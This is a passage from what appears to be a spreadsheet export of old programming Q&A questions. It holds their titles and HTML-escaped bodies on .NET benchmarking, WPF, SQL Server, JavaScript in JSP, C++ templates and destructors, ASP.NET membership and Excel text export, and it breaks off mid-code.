&lt;p&gt;Some more useful information:&lt;/p&gt;
&lt;p&gt;The behavior is like this: Run the application, close it and rerun it again, the benchmarking results seems to improve on the 2nd run and thereafter remains same. This behavior more prominent in case of running from C drive. 
I would also like to mention that my benchmark app has an option to rerun/retest a particular API without having to close the app. I do understand that there is jitting involved, but what I dont understand is that on the 1st run of app, when u rerun an API multiple times without closing the app, the performance stabilizes after a couple of runs, then when you close and rerun the same test, the performance seems to improve.&lt;/p&gt;
&lt;p&gt;Also, how do you account for the performance change when run from different drives? &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[INFORMATION UPDATE]&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I did an &lt;strong&gt;ngen&lt;/strong&gt; and now the performance difference between the different runs from same location is gone. i.e. If I open the benchmark app, run it once, close it and rerun it from same location, it shows same values.&lt;/p&gt;
&lt;p&gt;But I have encountered another problem now. When I launch the app from D drive and run it a couple of times (couple of iterations of APIs within the same launch of benchmark prog), and then from the 3rd iteration onwards, the performance of all APIs seems to fall by around 20%. Then If you close and relaunch the app and run it, for first 2 iterations, it gives correct values (same value as that obtained from C), then again performance falls beyond that. This behavior is not seen when run from C drive. From C drive, no matter how many runs you take, it is pretty consistent.&lt;/p&gt;
&lt;p&gt;I am using large double arrays to test my API performance. I was worried that the GC would kick in inbetween the tests so I am calling GC.Collect() &amp;amp; GC.WaitForPendingFinalizers() explictly before and after each test. So I dont think it has anything to do with GC.&lt;/p&gt;
&lt;p&gt;I tried using AQ time to know whats happening from 3rd iteration onwards, but funny thing is that When I run the application with AQ time profiling it, the performance does not fall at all.&lt;/p&gt;
&lt;p&gt;The performance counter as does not suggest any funny IO activity.&lt;/p&gt;
&lt;p&gt;Thanks
 Niranjan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove the linefeed or newline from a text file or cdr file including the spaces?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is my situation, I was able to remove the spaces using trim or replace. But it does not remove the linefeed or newline at the end of each file. How can I remove the spaces and linefeed in C#?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set tab size in the WPF RichTextBox</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The WPF RichTextBox can be set to accept tabs in its input. It renders the result as a 4 character indent. I'd like to change that size. How can I change the default?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Incorrect answer in dll import in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my Python script I'm importing a dll written in VB.NET.
I'm calling a function of initialisation in my script. It takes 2 arguments: a path to XML file and a string. It returns an integer - 0 for success, else error. The second argument is passed by reference. So if success, it will get updated with success message. Otherwise, get updated with error message.&lt;/p&gt;
&lt;p&gt;When my script receives the integer, I should print the message in the second variable. I'm not able to do that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I edit contacts from the front end in Joomla 1.5x?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd have thought this would be a native feature (seeing as joomla allows you to connect contacts with user accounts) but we can't find any way to do this! &lt;/p&gt;
&lt;p&gt;Does anyone know of any extensions/modules that would allow this?&lt;/p&gt;
&lt;p&gt;I'm not so hot on PHP so i'd really love to not have to code this by hand!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create email with css and images from Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you create and send emails from Rails application, that contain images and proper formatting? like the ones you get from facebook and like.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL 2005: Agent job step output file naming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know, please, if there's a way to specify "this machine" in a file path that SQL Server will like?&lt;/p&gt;
&lt;p&gt;I have an Agent job I want to script onto all my servers. It outputs to a file on the local machine so I want to script the file name as &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;\\localhost\&amp;lt;shared-folder-name&amp;gt;\&amp;lt;file-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another reason is I'm planning to use log shipping for disaster recovery and I want the jobs to work the same whichever server they're running on. The script sets the job up fine but when I run the job I get an error "Unable to open Step output file". I think I've eliminated share and folder permissions: it works fine with &lt;code&gt;C:\&amp;lt;folder-name&amp;gt;\&amp;lt;file-name&amp;gt;&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript String.replace(/\$/,str) works weirdly in jsp file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For simplicity, i have the following file named test.jsp:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script language="javascript"&amp;gt;
    alert("a$b".replace(/\$/g,"k"));
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I put this file in my local server, then display it using firefox:  &lt;a href="http://localhost:8080/myproj/test.jsp" rel="nofollow"&gt;http://localhost:8080/myproj/test.jsp&lt;/a&gt;. It works okay, the result alert string is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; akb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when i put this file in a remote server and use the same firefox to display, it output is: a$bk which is incorrect for me.&lt;/p&gt;
&lt;p&gt;Then i change the test.jsp content to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script language="javascript"&amp;gt;
    alert("a$b".replace(/\\$/g,"k"));
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Note here i add two slashes instead of one. In this case it works in the remote server but not in local one.&lt;/p&gt;
&lt;p&gt;Then i rename the file from test.jsp to test.html, but the content is the same as my first case, i.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script language="javascript"&amp;gt;
    alert("a$b".replace(/\$/g,"k"));
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By using the same firefox, it works okay in both servers.&lt;/p&gt;
&lt;p&gt;But my file needs to embed the javascript in jsp file. it is not allowed to use .html suffix for my file. What should I do to write a portable javascript in this scenario?&lt;/p&gt;
&lt;p&gt;My local server uses tomcat-5.5.26; remote server uses tomcat-5.0.28. Firefox version is  3.0.4.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass an array size as a template with template type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My compiler behaves oddly when I try to pass a fixed-size array to a template function. The code looks as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;algorithm&amp;gt;
#include &amp;lt;iostream&amp;gt;
#include &amp;lt;iterator&amp;gt;
template &amp;lt;typename TSize, TSize N&amp;gt;
void f(TSize (&amp;amp; array)[N]) {
    std::copy(array, array + N, std::ostream_iterator&amp;lt;TSize&amp;gt;(std::cout, " "));
    std::cout &amp;lt;&amp;lt; std::endl;
}
int main() {
    int x[] = { 1, 2, 3, 4, 5 };
    unsigned int y[] = { 1, 2, 3, 4, 5 };
    f(x);
    f(y); //line 15 (see the error message)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It produces the following compile error in GCC 4.1.2:&lt;/p&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;test.cpp|15| error: size of array has non-integral type â€˜TSizeâ€™
test.cpp|15| error: invalid initialization of reference of type
  â€˜unsigned int (&amp;amp;)[1]â€™ from expression of type â€˜unsigned int [5]â€™
test.cpp|6| error: in passing argument 1 of â€˜void f(TSize (&amp;amp;)[N])
  [with TSize = unsigned int, TSize N = ((TSize)5)]â€™
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;Note that the first call compiles and succeeds. This seems to imply that while &lt;code&gt;int&lt;/code&gt; is integral, &lt;code&gt;unsigned int&lt;/code&gt; isn't.&lt;/p&gt;
&lt;p&gt;However, if I change the declaration of my above function template to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;template &amp;lt;typename TSize, unsigned int N&amp;gt;
void f(TSize (&amp;amp; array)[N])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the problem just goes away! Notice that the only change here is from &lt;code&gt;TSize N&lt;/code&gt; to &lt;code&gt;unsigned int N&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Section [&lt;code&gt;dcl.type.simple&lt;/code&gt;] in the final draft ISO/IEC FDIS 14882:1998 seems to imply that an "integral type" is either signed or unsigned:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The &lt;code&gt;signed&lt;/code&gt; specifier forces &lt;code&gt;char&lt;/code&gt; objects and bit-fields to be signed; it is redundant with other integral types.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Regarding fixed-size array declarations, the draft says [&lt;code&gt;dcl.array&lt;/code&gt;]:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;If the &lt;em&gt;constant-expression&lt;/em&gt; (&lt;code&gt;expr.const&lt;/code&gt;) is present, it shall be an integral constant expression and its value shall be greater than zero.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So why does my code work with an explicit &lt;code&gt;unsigned&lt;/code&gt; size type, with an inferred &lt;code&gt;signed&lt;/code&gt; size type but not with an inferred &lt;code&gt;unsigned&lt;/code&gt; size type?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; Serge wants to know where I'd need the first version. First, this code example is obviously simplified. My real code is a bit more elaborate. The array is actually an array of indices/offsets in another array. &lt;del&gt;So, logically, the type of the array should be the same as its size type for maximum correctness.&lt;/del&gt; Otherwise, I might get a type mismatch (e.g. between &lt;code&gt;unsigned int&lt;/code&gt; and &lt;code&gt;std::size_t&lt;/code&gt;). Admittedly, this shouldn't be a problem in practice since the compiler implicitly converts to the larger of the two types.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 2&lt;/strong&gt; I stand corrected (thanks, litb): size and offset are of course logically different types, and offsets into C arrays in particular are of type &lt;code&gt;std::ptrdiff_t&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interface to a webservice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two webservices that have exactly the same methods and signatures but point at different servers (specifically the Virtual Earth production and staging environments). I wish to switch between using the production and staging services on the basis of a config setting and don't want to repeat myself and replicate each method where I call one of the services.&lt;/p&gt;
&lt;p&gt;So what I need in effect is to create an interface which both of the services can implement and program against that. But I don't know if this is advisable or even possible.&lt;/p&gt;
&lt;p&gt;Or do I just need to reference one of the services and switch the url property depending on whether I want to use the production or staging environment?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change the Auto Growth size? MS SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In MS Sql server 2005, by default 1MB Auto Growth is there, How can i change it to whatever i need.?&lt;/p&gt;
&lt;p&gt;Thanx,
Ambanna&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What could possibly cause JQuery's selector to break?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get an element using JQuery's selector, but it does not find it even though the element actually exists. Moreover, I can actually find the element using getElementById.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;$('#outputDiv') gives me a null value. But document.getElementById("outputDiv") returns me the Div I was trying to access.&lt;/p&gt;
&lt;p&gt;Any idea?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Use of GetGuiResources</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it a good idea to use &lt;code&gt;GetGuiResources(GetCurrentProcess(), GR_GDIOBJECTS)&lt;/code&gt; at the start of &lt;code&gt;WinMain&lt;/code&gt;, and before the last return to detect GDI leaks or, more specifically, objects I forgot to release?&lt;br/&gt;Also I'm currently wondering why the first call in my program returns &lt;code&gt;4&lt;/code&gt; when there's no window yet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>making a constant heading - css problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an AJAX application which has used CSS divs to create panels on the screen, which are loaded separately and in succession, depending on what was loaded before it. The bottom "panel" is a table showing a list or records from a database. At the top of the database is the name of the table, and I would like a way to have it be always above the list of records. I am unsure of how to do this, if it is with Javascript, or PHP, or css and html.&lt;/p&gt;
&lt;p&gt;edit: I tried wrapping the table header in a div and setting the css for this purpose, but the table header does not seem to be in its own header and does not stay on screen separate from the records.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.tableheader {
    position: absolute;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$table = 'AUCTIONS';
$rows = getRowsByArticleSearch($query, $table);
echo '&amp;lt;div id="tableheader" class="tableheader"&amp;gt;';
echo "&amp;lt;h1&amp;gt;{$query} Auctions&amp;lt;/h1&amp;gt;" . "\n"; 
echo "&amp;lt;/div&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Have I missed something fundamental here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing for a deadlock with nUnit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to unit testing and nUnit (2.48). I'd like to write a test method where the failure case is that it deadlocks. Is this possible? Obviously nUnit doesn't know by default how long the method should take to execute, so would I have to write code to do the work on a separate thread and then abort it and throw and exception if it took longer than some time I define? Is there a better way to do this?&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does IL Merge work with .NET Compact Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have experience using IL Merge and the .NET CF? Does IL Merge work with CF? Are there any known problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I avoid Alternative Control Syntax?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a mostly self-taught programmer, I have never really had anyone explain why certain things should or should not be used. One example (which I picked up years ago and use quite often) is the alternative control structure syntax:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x = (y == true) ? "foo" : "bar";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I personally find this syntax easy to follow, especially for short, concise code, but I don't see it get a lot of use "in the wild" so I'd like to know if it's bad practice to use this over a more traditional &lt;em&gt;if ... else&lt;/em&gt; structure?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to unit test library that relies on Session object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several asp.net mvc websites consuming the same controller and model.&lt;br /&gt;
This common logic is put in seperate libraries.
These libraries use the HttpContext.Current.Session. How can I make these unit testable?
I read about the StateValue but can't completely grasp it. Where should I get this StateValue thing? Is it a lib I reference?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In JQuery is there way for slideDown() method to scroll the page down too?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The slideDown applied to a div does the slideDown but doesn't scroll the page down and the div slided down div remains hidden from view. Is there a way to scroll the page down as well so the user can view the div?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.Net Membership.DeleteUser</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In testing, the user on a db i've used was a big jefe.  In production, he only has Execute.&lt;/p&gt;
&lt;p&gt;When I called,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Membership.DeleteUser(user)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In testing, it worked.
I try the same in production, and I get this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The DELETE statement conflicted with the REFERENCE constraint
  "FK__aspnet_Us__UserI__37703C52". The conflict occurred in database
  "Testing", table "dbo.aspnet_UsersInRoles", column 'UserId'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In my seargles (searches on Google), I came across this &lt;a href="http://www.dougdossett.com/Details.aspx?Detail=35" rel="nofollow"&gt;link&lt;/a&gt;
where the dude was saying, &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Error: The DELETE statement conflicted
  with the REFERENCE constraint
  "FK__aspnet_Me__UserI__15502E78". The
  conflict occurred in database
  "YourDBName", table
  "dbo.aspnet_Membership", column
  'UserId'.&lt;/p&gt;
  &lt;p&gt;Took me a while to find a solution to
  this across multiple sites and options
  as the error and possible solutions
  were rather misleading.  Turns out, at
  least in my case, it was a problem
  with permissions on the membership
  database.  The user I'm using to
  connect had access to view the
  membership details within the database
  itself, but as part of the
  aspnet_Users_DeleteUser stored
  procedure it selects from the
  sysobjects table.  The membership
  connection user apparently did not
  have sufficient rights to do that
  select so the overall delete failed. &lt;/p&gt;
  &lt;p&gt;The fix for me was to add the user to
  the aspnet_Membership_FullAccess role
  for the membership database.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;But when I did that it didn't work. Anyone have any ideas on how to deal with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I set the focus of a ListBox in XAML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this ListBox:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ListBox Name="lbColor"&amp;gt;
    &amp;lt;ListBoxItem Content="Blue"/&amp;gt;
    &amp;lt;ListBoxItem Content="Red"/&amp;gt;
    &amp;lt;ListBoxItem Content="Orange"/&amp;gt;
&amp;lt;/ListBox&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code pre-selects the choice alright, but doesn't set the focus, how can I do that?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public Window1()
{
    InitializeComponent();
    lbColor.SelectedIndex = 1;
    lbColor.Focus = 1;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Partial Classes, LINQ, Interfaces and VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Okay, I have ran in to a problem with VB.NET. So all those defenders of VB.NET please can you help me out? Here is my issue: I am using LINQ to Entities, it also works with LINQ to SQL, I build my edmx file I then create a Partial Publc Class of the same name as one of the entities All fine up to now, so here comes the problem. &lt;/p&gt;
&lt;p&gt;I need the Partial class to implement an Interface Implements Interfaces.IAsset But VB.NET want to place "Implements Interfaces.IAsset.ID" at the end of the property, which of course is in the generated code section of the Partial class, which I can not do as the edmx file is auto generated and will change in the future. &lt;/p&gt;
&lt;p&gt;Here is the line of code that needs sorting: &lt;/p&gt;
&lt;p&gt;Public Property ID1() As Integer Implements Interfaces.IAsset.ID &lt;/p&gt;
&lt;p&gt;In C# it is fine and works wonders. So why can't VB.NET implement an interface that is in the code generated class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SORTING Hierarchical Queries in SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have following issue: I have a table for maintaining the hierarchical data. I'd like to use CTE from SQL 2005.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WITH tree (id, parentid, code, name) AS
(
    SELECT id, ofs.ParentID, ofs.code, ofs.name
      FROM OrganizationFeatures ofs
     WHERE ofs.ParentID IS NULL
    UNION ALL
    SELECT ofs.id, ofs.ParentID, ofs.code, ofs.name
      FROM OrganizationFeatures ofs
      JOIN tree ON tree.ID = ofs.ParentID
)
select * from tree
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'd like to sort by code and the result shold be as following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1
1/1
1/1/1
1/1/2
1/2/1
1/2/2
2
4/1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;etc. Any ideas? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to transfer databases and site contents</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I own a website with 20 GB data on it Now I decided to change the Hosting compnay .
I'm Moving to Russian VPS so is there a way to transfer the contents of my website to the Russian VPS without uploading them again .&lt;/p&gt;
&lt;p&gt;Is there a service that does this.
I heard that there is a way to do this using shell access (BUT what is shell access and how it works) 
thanx in advance guys&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby string mutability</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This may be a bit of a nooby question, I have been trying to get better at ruby recently, and started reading the fantastic &lt;a href="http://oreilly.com/catalog/9780596516178/"&gt;The Ruby Programming Language&lt;/a&gt;. Something that was mentioned is that string literals are considered mutable, so in a loop it is better to use a variable then a literal, as a new string will get instantiated at every iteration.&lt;/p&gt;
&lt;p&gt;My question is why? At first I thought it was because of interpolation, but symbols are immutable and they support interpolation. Coming from a static background, it doesn't really make much sense to me.&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;After reading &lt;a href="http://stackoverflow.com/users/210/thenduks"&gt;thenduks&lt;/a&gt; answer, I think I may have it. AFAIK, languages like Java or C# don't have destructive string methods (they use upcase, but not upcase!). Because of things like upcase! or &amp;lt;&amp;lt;, the literal cannot be immutable.&lt;/p&gt;
&lt;p&gt;Not 100% sure on that, the other possibility is that it is a compile-time interning that happens, which is something that just doesn't happen in a scripting language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET TempData persists between requests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using temp data as follow in my controllers - very simple, when there is a problem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TempData("StatusMessage") = "You have no items set to Auto-Ship."
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then on every page I have a user control as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class="error-container"&amp;gt;
&amp;lt;%  If TempData.ContainsKey("ErrorMessage") Then%&amp;gt;
&amp;lt;script&amp;gt; $('div.error-container').show();&amp;lt;/script&amp;gt;
&amp;lt;div class="msg-error"&amp;gt;&amp;lt;p&amp;gt;&amp;lt;%=TempData("ErrorMessage") %&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;% End If%&amp;gt;
&amp;lt;%  If TempData.ContainsKey("StatusMessage") Then%&amp;gt;
&amp;lt;script&amp;gt; $('div.error-container').show();&amp;lt;/script&amp;gt;
&amp;lt;div class="msg-status"&amp;gt;&amp;lt;p&amp;gt;&amp;lt;%=TempData("StatusMessage")%&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;% End If%&amp;gt;
&amp;lt;ul&amp;gt;&amp;lt;/ul&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Problem is when I do have an error added to tempdata it shows up properly on the first request but ALSO shows up again on the next request as well - which is obviously very confusing and not a desired behavior.&lt;/p&gt;
&lt;p&gt;I am not using any IoC, I did see the post with the same problems when using that.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Correct way to use Actions to create menus, toolbars, and other components in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The naive way of writing building a menu in a Java Swing app is to do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;JMenu fileMenu = new JMenu("File");
JMenuItem openItem = new JMenuItem("Open...");
openItem.addActionListener(new ActionListener() { /* action listener stuff */ } )
fileMenu.addMenuItem(openItem);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A more experienced developer will recognize that actions can be accessed through a variety of mechanisms - menus, toolbar buttons, maybe even other workflows in the system.  That person is more likely to write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Action openAction = new AbstractAction();
openAction.setName("Open...");
openAction.addActionListener(new ActionListener() { /* action listener stuff */ } )
...
JMenuItem openItem = new JMenuItem(openAction);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My question is, &lt;b&gt;what is the best way to manage these Action objects so they can be used across menus, toolbars, etc?&lt;/b&gt; &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create a factory class that returns specific actions?  &lt;/li&gt;
&lt;li&gt;Declare all of the actions as &lt;code&gt;private static final Action&lt;/code&gt; in some utility class?  &lt;/li&gt;
&lt;li&gt;Take advantage of a Java application framework?  &lt;/li&gt;
&lt;li&gt;Something else?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Possible to Geo-tag Photos using iPhone ImagePicker?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When calling the ImagePicker to take a picture the user is not prompted to allow their location to be used to geo-tag the photo as with the native Camera app.  Is it possible to turn on or build geo-tagging into the ImagePicker?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Export Excel range/sheet to formatted text file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been tasked with creating a reusable process for our Finance Dept to upload our payroll to the State(WI) for reporting. I need to create something that takes a sheet or range in Excel and creates a specifically formatted text file.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;THE FORMAT&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Column 1 - A Static Number, never changes, position 1-10&lt;/li&gt;
&lt;li&gt;Column 2 - A Dynamic Param filled at runtime for Quarter/Year, position 11-13&lt;/li&gt;
&lt;li&gt;Column 3 - SSN, no hyphens or spaces,
filled from column A, position 14-22&lt;/li&gt;
&lt;li&gt;Column 4 - Last Name, filled from
column B, Truncated at 10, Left
Justify &amp;amp; fill with blanks, position
23-32&lt;/li&gt;
&lt;li&gt;Column 5 - First Name, filled from C,
Truncate at 8, Left Justify &amp;amp; fill
with blanks, position 33-40&lt;/li&gt;
&lt;li&gt;Column 6 - Total Gross Wages/Quarter,
filled from D, strip all formatting,
Right Justify Zero Fill, position
41-49&lt;/li&gt;
&lt;li&gt;Column 7 - A Static Code, never
changes, position 50-51&lt;/li&gt;
&lt;li&gt;Column 8 - BLANKS, Fill with blanks,
position 52-80&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have, I assume, 3 options:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;VBA&lt;/li&gt;
&lt;li&gt;.NET&lt;/li&gt;
&lt;li&gt;SQL&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I had explored the .NET method first but I just couldn't find decent documentation to get me going.  I still like this one but I digress.&lt;/p&gt;
&lt;p&gt;Next I have some VBA that will dump a Sheet to a fixed width Text.  I am currently pursuing this which leads, finally, to my actual question.&lt;/p&gt;
&lt;p&gt;How do I transform a Range of text in Excel?  Do I need to coy it over to another sheet and then pass over that data with the neccesarry formatting functions the run my Dump to text routine?  I currently had planned to have a function for each column but I am having trouble figuring out how to take the next step.  I am fairly new at Office programming and developing in general so any insight will be greatly appreciated.&lt;/p&gt;
&lt;p&gt;The SQL option would be my fall back as I have done similar exports from SQL in the past.  I just prefer the other two on the, &lt;em&gt;"I don't want to be responsible for running this,"&lt;/em&gt; principle.&lt;/p&gt;
&lt;p&gt;Thanks in advance for any time given.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you create a daemon in Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.google.co.uk/search?q=python+daemon"&gt;Searching on Google&lt;/a&gt; reveals x2 code snippets. The first result is to &lt;a href="http://code.activestate.com/recipes/278731/"&gt;this code recipe&lt;/a&gt; which has a lot of documentation and explanation, along with some useful discussion underneath. &lt;/p&gt;
&lt;p&gt;However, &lt;a href="http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/"&gt;another code sample&lt;/a&gt;, whilst not containing so much documentation, includes sample code for passing commands such as start, stop and restart. It also creates a PID file which can be handy for checking if the daemon is already running etc.&lt;/p&gt;
&lt;p&gt;These samples both explain how to create the daemon. Are there any additional things that need to be considered? Is one sample better than the other, and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Select Cell Based from Macro</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This should be simple, not sure why I am having trouble with this.....
In a data input range that a user is entering data there is a "left" and a "right" side of the form. Not all the data in any given row has to be filled in. I want to create a macro (and assign it to a hot key I.E. ctrl-z  ) such that if it is hit it will position the active cell to be in the current row and in column "X". in other words hitting the ctrl-Z will cause the cursor to jump to column "X" &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is the destructor ignored in this code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following code demonstrates a weird problem I have in a Turbo C++ Explorer project. One of the three stack objects in D::D() is not destroyed after going out of scope. &lt;/p&gt;
&lt;p&gt;This only happens if compiled in release mode, the auto_ptrs a_ and b_ are of different types and the exception thrown doesn't inherit from std::exception. It appears to work just fine in VC++ 2005 and C++ Builder 2009. I did install the BDS2006 Update 2, the hotfix rollup and hotfix 12.&lt;/p&gt;
&lt;p&gt;Is it my code or the compiler? Do you know of a fix? Not being able to reliably use auto_ptr in a VCL project would be quite inconvenient. &lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;memory&amp;gt;
#include &amp;lt;stdexcept&amp;gt;
#include &amp;lt;iostream&amp;gt;
typedef std::exception my_error; // will work fine if replaced with line below
//class my_error : public std::exception {};
class A {};
class B {};
class C
{
public:
    C(int id) : id_(id) { std::cout &amp;lt;&amp;lt; "C::C() " &amp;lt;&amp;lt; id_ &amp;lt;&amp;lt; std::endl; };
    ~C() { std::cout &amp;lt;&amp;lt; "C::~C() " &amp;lt;&amp;lt; id_ &amp;lt;&amp;lt; std::endl; };
private:
    int id_;
};
class D
{
public:
    D()
    {
        C c1(1);
        C c2(2);
        C c3(3);
        throw my_error();
    };
private:
    std::auto_ptr&amp;lt;A&amp;gt; a_;
    std::auto_ptr&amp;lt;B&amp;gt; b_; // will work fine if replaced with line below
